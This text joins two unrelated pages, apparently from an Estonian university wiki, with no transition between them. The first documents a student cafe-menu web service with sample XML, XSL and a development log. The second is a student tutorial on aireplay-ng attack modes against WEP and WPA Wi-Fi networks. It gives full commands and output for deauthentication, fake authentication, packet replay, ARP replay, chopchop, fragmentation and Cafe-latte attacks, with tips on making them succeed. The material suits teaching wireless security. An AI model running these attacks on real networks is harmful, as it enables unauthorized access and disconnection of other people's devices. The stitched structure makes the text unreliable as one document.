**MVC3 raamistik
**Razor view engine mugavamaks kirjutamiseks
**MSSQL 2008 R2 andmebaasi mootoriks
**Andmete vahekiht LINQ To Entities

*Tagastab kohviku menüü veebiteenuse ID järgi
*Klienditeenus genereerib igale kohvikule ID
*auth meetod
**tuvastatkse kasutaja
**päring kohviku andmetele

*api meetod
**auth vastusest kuvab kohviku menüü
**Päeva menüü xml kujul

*Statistika korjamine
**Kohviku, meetodi ning IP põhine
***Võimaldab näha statistikat kasutaja ja kohviku lõikes
***Võimaldab näha koormust meetodi põhiselt
**Minimaalne täpsus üks tund
***Et andmemahud ei kasvaks üle pea
***Et oleks võimalik koormust hinnata kellaajaliselt
*[[File:HSFBstats.png]]

===Toodete kuvamine===
[[File:HSFBVeebiteenus.png]]

==Andmediagramm==

[[File:HSFB.png]]

==Desktop Rakendus==
*Töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4
[[File:HFt66.png]]

==Facebook Api==
*Toitude hääletamine reaalajas
[[File:HSFBapi.jpg]]

== XML Fail ==
Highlighted: http://sprunge.us/DPIe?xml

<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet type="text/xsl" href="default.xsl"?>
<kohvikud xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="kohvikud.xsd">
<kohvik name="IT KOHVIK" staatus="Nummisi pannkooke saadaval">
<toit tyyp="praad">
<pilt>
<url width="100" height="100">http://www.neti.ee/pilt.jpg</url>
</pilt>
<pealkiri>kanapraad</pealkiri>
<kirjeldus>sinihallitus sokiga</kirjeldus>
<poolhind valuuta="eur" rate="1.0000">100</poolhind>
<tervehind valuuta="eur" rate="1.0000">200</tervehind>
<allahindlus>50%</allahindlus>
<kehtib>31.03.2011</kehtib>
<liked>34</liked>
</toit>
<toit tyyp="supp">
<pilt>
<url width="100" height="100">http://www.neti.ee/pilt2.jpg</url>
</pilt>
<pealkiri>õunasupp</pealkiri>
<kirjeldus>koorega</kirjeldus>
<poolhind valuuta="eur" rate="1.0000">50</poolhind>
<tervehind valuuta="eur" rate="1.0000">120</tervehind>
<allahindlus>10%</allahindlus>
<kehtib>31.03.2011</kehtib>
<liked>33</liked>
</toit>
</kohvik>
<kohvik name="TTY KOHVIK" staatus="Parim koht">
<toit tyyp="praad">
<pilt>
<url width="100" height="100">http://www.neti.ee/pilt2.jpg</url>
</pilt>
<pealkiri>seapraad</pealkiri>
<kirjeldus>seentega</kirjeldus>
<poolhind valuuta="eur" rate="1.0000">200</poolhind>
<tervehind valuuta="eur" rate="1.0000">420</tervehind>
<allahindlus>10%</allahindlus>
<kehtib>31.03.2011</kehtib>
<liked>2</liked>
</toit>
</kohvik>
</kohvikud>

== XSL ==

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template match="/">
<html>
<body>
<h2>Kohvikud</h2>
<table border="1">
<tr bgcolor="#9acd32">
<th>Nimi</th>
<th>Staatus</th>
<th>Menüü</th>
</tr>
<xsl:for-each select="kohvikud/kohvik">
<tr>
<td valign="top"><xsl:value-of select="@name"/></td>
<td valign="top"><xsl:value-of select="@staatus"/></td>
<td valign="top">
<table border="1">
<tr bgcolor="#2acd32">
<td>Pealkiri</td>
<td>Väike portsjon</td>
<td>Täis portsjon</td>
<td>Soodustus</td>
<td>Kehtib</td>
<td>Kirjeldus</td>
<td>Laike</td>
<td>Pildid</td>
</tr>
<xsl:for-each select="./toit">
<tr>
<td><xsl:value-of select="pealkiri"/></td>
<td><xsl:value-of select="poolhind"/></td>
<td><xsl:value-of select="tervehind"/></td>
<td><xsl:value-of select="allahindlus"/></td>
<td><xsl:value-of select="kehtib"/></td>
<td><xsl:value-of select="kirjeldus"/></td>
<td><xsl:value-of select="liked"/></td>
<td>
<xsl:for-each select="./pilt">
<xsl:value-of select="url"/>
</xsl:for-each>
</td>
</tr>
</xsl:for-each>
</table>
</td>
</tr>
</xsl:for-each>
</table>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

== ASP.Net aine raames adminni sisuhaldus ==

'''Nagu eelpool mainitud, kasutame MVC3 raamistikku, andmeid liigutab LINQ to entities.'''

'''Kasutajal tuleb autentida, selleks on aspi enda membership lahendus.'''

[[File:HFSB_login.png]]

'''Menüüde halduse esileht'''

[[File:HFSB_front.png]]

'''Kohvikute vaade, üldadmin näeb kõiki kohvikuid, tavaadmin ainult temaga seostatud kohvikuid'''

[[File:HFSB_cafes_front.png]]

'''Igal kohvikul on enda tooted..'''

[[File:HFSB_tooted_front.png]]

'''..mille sisestamine näeb välja selline:'''

[[File:HFSB_edit_product.png]]

'''Tooteid saab luua, kustutada ja välja lülitada (viimane toimub ajaxiga).

Tootel on küljes kehtivus kuupäev, vastavalt millele genereeritakse menüü. Menüüs on iga päeva peal toode, mis sel päeval kehtib.
'''

[[File:HFSB_menufilter.png]]

== Logi ==
=== 16. Mai ===
Finaalesitlus

=== 13. Mai ===
Ebaõnne päev ja lõpusirge arendus!

=== 6. Mai ===
Desktopvaate analüüs
töölauakliendi jooksutamiseks on vaja Python 2.7.1 ning PyQt4 4.8.4

=== 29. Aprill ===
Veebiteenuse parendamine

=== 22. Aprill ===
Konkurendiga koostöö lepingu sõlmimine, koodivahetus.

=== 18. Aprill ===
Teenuse presentatsioon, karm tagasiside ehk esimese testimis tulemuste analüüs ja iteratiivse arenguga jätkamine

=== 15-17. Aprill ===
Veebiteenuse lõpu sprint
Andmebaasi lisatud tabel, mis korjab statistikat

=== 8. Aprill ===
Arendus Sprint
*määramatusest tulenevad probleemid
*vaate toorik
*versiooni halduse

=== 4. Aprill ===
Alamprojekt baasitäitmiseks

=== 18. Märts ===
Andmebaasi lihvimine, teenuse toorik.
Projektijuht 2 nädalat komandeeringus, arenduse koordinaator sinisel lehel.

=== 15. Märts ===
Töötav andmebaas, metsikud vaevad versioonihaldusega.
=== 7. Märts ===
Rühmatöö ettevalmistused ja ümberkorraldused: MVC3 (Razor view engine) ja MSSQL SERVER 2008 R2 asendamine. Versioonihalduseks Mercurial HG.
=== 1. Märts ===
Andmediagrammi esialgsed kavandid, et sobiks xmliga kokku.

=== 23. Veebruar ===
Tekkisid määramatusest tulenevad probleemid, haigestumine ja riigipühad.
Xml ja Xsl valmis, Schema vajab täiendusi.

=== 17. Veebruar ===
Projekti kavand pandi paika ja jaotati esialgsed töö ülesanded.
Esialgse Xml'i draft, endiselt arenduses.

=== 16. Veebruar ===
Drastilised muudatused arendus tööriistade valikul. Põhi osa programmist luuakse Pythoniga .NET raamistikus, aga kliendi liides tehakse ikkagi asp.net'iga.

=== 14. Veebruar ===
Meeskonna nime valik ja wiki lehe alustamine.

=== 7. Veebruar ===
Arendus vahenditega tutvumine, kuidas teha, mida teha. Palju metadata kogumist.

=== 2. Veebruar ===
Uue meeskonna moodustamine ja idee kujunemine

[[Category: Võrgurakendused II: hajussüsteemide ehitamine]]
[[Category: Veebirakenduste loomine ASP.NET abil]]

Aireplay-ng ründerežiimid

2011-05-24T19:27:13Z

Tliiv: /* Klientideta võrgu ründamine */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>...
15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0
Read 4 packets...

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 de00 0014 6c7e 4080 000f b534 3030 .A....l~@....400
0x0010: ffff ffff ffff 4045 d16a c800 6f4f ddef ......@E.j..oO..
0x0020: b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162 ...|.*d....c..Ab
0x0030: 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d ../t....#...^EuM
0x0040: 23e0 883e #..>

Use this packet ? y
</pre>

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0
Read 10 packets...

Size: 124, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = BB:BB:BB:BB:BB:BB
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 ."..\{06)...

Use this packet ? y
</pre>

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA-d FF:FF:FF:FF:FF:FF -t 1 mon0
...
</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

<pre>
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Saving ARP requests in replay_arp-0001-123456.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...
</pre>

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre>$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA mon0
Read 165 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F

Use this packet ? y

Saving chosen packet in replay_src-0001-123456.cap

Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms
Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms
Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms
Offset 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 483ms
Offset 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 36ms
...
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0001-123457.cap
Saving keystream in replay_dec-0001-123456.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
$ sudo aireplay-ng -5 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Waiting for a data packet...
Read 96 packets...

Size: 120, FromDS: 1, ToDS: 0 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = CC:CC:CC:CC:CC:CC
Source MAC = BB:BB:BB:BB:BB:BB

0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D...w.....<R.
0x0070: 0505 933f af2f 740e ...?./t.

Use this packet ? y
Saving chosen packet in replay_src-0001-123456.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0001-123456.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

<pre>
$ sudo aireplay-ng -6 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA -D mon0
...
</pre>

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
